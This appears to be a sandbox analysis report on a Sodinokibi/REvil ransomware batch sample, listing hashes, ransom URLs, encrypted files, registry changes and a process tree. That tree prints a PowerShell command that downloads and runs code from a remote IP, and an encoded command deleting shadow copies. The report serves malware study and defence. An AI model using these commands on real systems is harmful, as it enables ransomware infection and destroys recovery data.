Analysis
max time kernel: 128s
max time network: 59s
platform: windows7_x64
resource: win7v200430
submitted: 12-06-2020 14:10

Static task: static1
Behavioral task: behavioral1
  Sample: e311ca0dbd0eb9014f1e66e9c74a7634.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: e311ca0dbd0eb9014f1e66e9c74a7634.bat
  Resource: win10v200430
General
Target: e311ca0dbd0eb9014f1e66e9c74a7634.bat
Size: 213B
MD5: 40fe3c2a1ab5a72052998d4af7cff154
SHA1: 4dff0fbc5e91e076066f61c666c1a7da294e0d33
SHA256: c9587e50149d6b16f99a0ec810f89670c4e75cc8610641973f55796712ad8fb8
SHA512: bca3682a5e819a086ef4102fd599fe8ea60d5737c005274af710a378054da7f4251e719b1ad8c799b6d50b51787fc7ce81956a7f3f5f6f533f0c0c403a19d280
Malware Config
Extracted from: http://185.103.242.78/pastes/e311ca0dbd0eb9014f1e66e9c74a7634
Extracted from: C:\9402gukj-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2F06AC9FA31C1D27
  http://decryptor.cc/2F06AC9FA31C1D27
Signatures

Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes:
  pid   process
  1624  powershell.exe
  1624  powershell.exe
  1624  powershell.exe
  660   powershell.exe
  660   powershell.exe
  1624  powershell.exe (all remaining entries; 77 IoCs in total per the signature count)
Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 4 IoCs)
Processes:
  description  ioc                                                                                                     process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer                vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                                vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                              vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                                     vssvc.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes:
  pid   process
  1624  powershell.exe

Suspicious use of WriteProcessMemory (5 IoCs)
Processes:
  description                        pid   process         target process
  PID 1052 wrote to memory of 1624   1052  cmd.exe         powershell.exe
  PID 1624 wrote to memory of 660    1624  powershell.exe  powershell.exe
  PID 1624 wrote to memory of 660    1624  powershell.exe  powershell.exe
  PID 1624 wrote to memory of 660    1624  powershell.exe  powershell.exe
  PID 1624 wrote to memory of 660    1624  powershell.exe  powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Drops file in Program Files directory (42 IoCs)
Processes:
  description                   ioc                                                                                      process
  File opened for modification  \??\c:\program files\DismountResolve.aiff                                                powershell.exe
  File created                  \??\c:\program files (x86)\9402gukj-readme.txt                                           powershell.exe
  File opened for modification  \??\c:\program files\CloseOptimize.ex_                                                   powershell.exe
  File opened for modification  \??\c:\program files\CloseSubmit.mhtml                                                   powershell.exe
  File opened for modification  \??\c:\program files\CloseConvertTo.M2V                                                  powershell.exe
  File opened for modification  \??\c:\program files\ExitBlock.mpp                                                       powershell.exe
  File opened for modification  \??\c:\program files\ExitStep.css                                                        powershell.exe
  File opened for modification  \??\c:\program files\InstallSelect.aiff                                                  powershell.exe
  File opened for modification  \??\c:\program files\RegisterConvert.wav                                                 powershell.exe
  File opened for modification  \??\c:\program files\UnprotectClose.TS                                                   powershell.exe
  File created                  \??\c:\program files\9402gukj-readme.txt                                                 powershell.exe
  File opened for modification  \??\c:\program files\CompressPush.html                                                   powershell.exe
  File opened for modification  \??\c:\program files\ConvertUnprotect.jpeg                                               powershell.exe
  File opened for modification  \??\c:\program files\UnblockConvertTo.m4v                                                powershell.exe
  File opened for modification  \??\c:\program files\RegisterProtect.xlsb                                                powershell.exe
  File opened for modification  \??\c:\program files\ResumeBlock.crw                                                     powershell.exe
  File opened for modification  \??\c:\program files\SwitchReceive.jpg                                                   powershell.exe
  File opened for modification  \??\c:\program files\ProtectAssert.rtf                                                   powershell.exe
  File opened for modification  \??\c:\program files\ResumeUse.png                                                       powershell.exe
  File opened for modification  \??\c:\program files\SyncRestore.tif                                                     powershell.exe
  File opened for modification  \??\c:\program files\AddWatch.pot                                                        powershell.exe
  File opened for modification  \??\c:\program files\ExpandResume.mpg                                                    powershell.exe
  File opened for modification  \??\c:\program files\ImportGrant.mpg                                                     powershell.exe
  File opened for modification  \??\c:\program files\MeasureFind.txt                                                     powershell.exe
  File opened for modification  \??\c:\program files\NewSync.rar                                                         powershell.exe
  File opened for modification  \??\c:\program files\ResolveSend.xht                                                     powershell.exe
  File opened for modification  \??\c:\program files\SelectMeasure.3g2                                                   powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\9402gukj-readme.txt  powershell.exe
  File opened for modification  \??\c:\program files\CheckpointLock.tif                                                  powershell.exe
  File opened for modification  \??\c:\program files\CompareConfirm.png                                                  powershell.exe
  File opened for modification  \??\c:\program files\HideCompare.potm                                                    powershell.exe
  File opened for modification  \??\c:\program files\ImportSkip.xml                                                      powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\9402gukj-readme.txt             powershell.exe
  File opened for modification  \??\c:\program files\SelectRegister.mp4v                                                 powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\9402gukj-readme.txt        powershell.exe
  File opened for modification  \??\c:\program files\ClearExit.vdx                                                       powershell.exe
  File opened for modification  \??\c:\program files\ExitSuspend.7z                                                      powershell.exe
  File opened for modification  \??\c:\program files\GrantSkip.dwg                                                       powershell.exe
  File opened for modification  \??\c:\program files\UnpublishSplit.vsd                                                  powershell.exe
  File opened for modification  \??\c:\program files\ProtectImport.bmp                                                   powershell.exe
  File opened for modification  \??\c:\program files\UnlockWatch.3gp                                                     powershell.exe
  File opened for modification  \??\c:\program files\UnprotectOpen.vbe                                                   powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes:
  description      ioc                                                                                                                                        process
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5l212d.bmp"  powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  description                      pid   process
  Token: SeDebugPrivilege          1624  powershell.exe
  Token: SeDebugPrivilege          1624  powershell.exe
  Token: SeDebugPrivilege          660   powershell.exe
  Token: SeBackupPrivilege         1644  vssvc.exe
  Token: SeRestorePrivilege        1644  vssvc.exe
  Token: SeAuditPrivilege          1644  vssvc.exe
  Token: SeTakeOwnershipPrivilege  1624  powershell.exe

Blacklisted process makes network request (1 IoCs)
Processes:
  flow  pid   process
  4     1624  powershell.exe
Processes

C:\Windows\system32\cmd.exe
  command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\e311ca0dbd0eb9014f1e66e9c74a7634.bat"
  PID: 1052
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/e311ca0dbd0eb9014f1e66e9c74a7634');Invoke-EACMHY;Start-Sleep -s 10000"
    PID: 1624
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is Base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      PID: 660
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  PID: 1644
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken